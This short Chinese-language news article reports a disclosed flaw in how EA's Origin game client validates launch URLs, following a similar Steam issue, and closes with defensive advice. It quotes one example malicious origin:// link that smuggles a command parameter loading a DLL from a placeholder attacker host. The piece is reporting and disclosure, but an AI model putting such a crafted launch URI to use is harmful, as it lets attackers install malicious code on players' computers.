EA公司想在遊戲數字下載平台與Steam分庭抗禮,於是成立了Origin平台,兩家相互競爭,開啟了數字下載平台的百花齊放。根據計算機安全公司ReVuln去年曝光了Steam平台存在URL地址訪問安全漏洞,如今曝光了EA的Origin平台同樣具有類似的問題。據悉Origin平台的URL驗證機製存在漏洞,黑客可以利用這一漏洞推送假冒URL鏈接來向玩家計算機中安裝惡意程序。
玩家在試圖通過Origin啟動遊戲時,客戶端會先向服務器請求一個用來啟動遊戲的URL地址,比如:origin://LaunchGame/[GameID],而如果該地址被黑客攔截並替換成包含有不良內容的加鏈接,比如:origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll,那麼一旦玩家執行啟動遊戲操作時便會導致自己的計算機遭遇安全風險。
不過,研究人員也表示,雖然Origin平台自身具有這樣的安全機製缺陷,但黑客想要通過這種方式對用戶發起攻擊也並非易於反掌,因為目前大多瀏覽器產品都具有非法URL過濾攔截功能,所以為了確保計算機的安全,用戶一定要保證打開相關的瀏覽器安全功能,並且安裝有最新版的防病毒軟件,同時拒絕訪問那些不熟悉的URL地址。
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
下載 
喜歡 
高興
鬼臉
嗬嗬
無聊
傷心
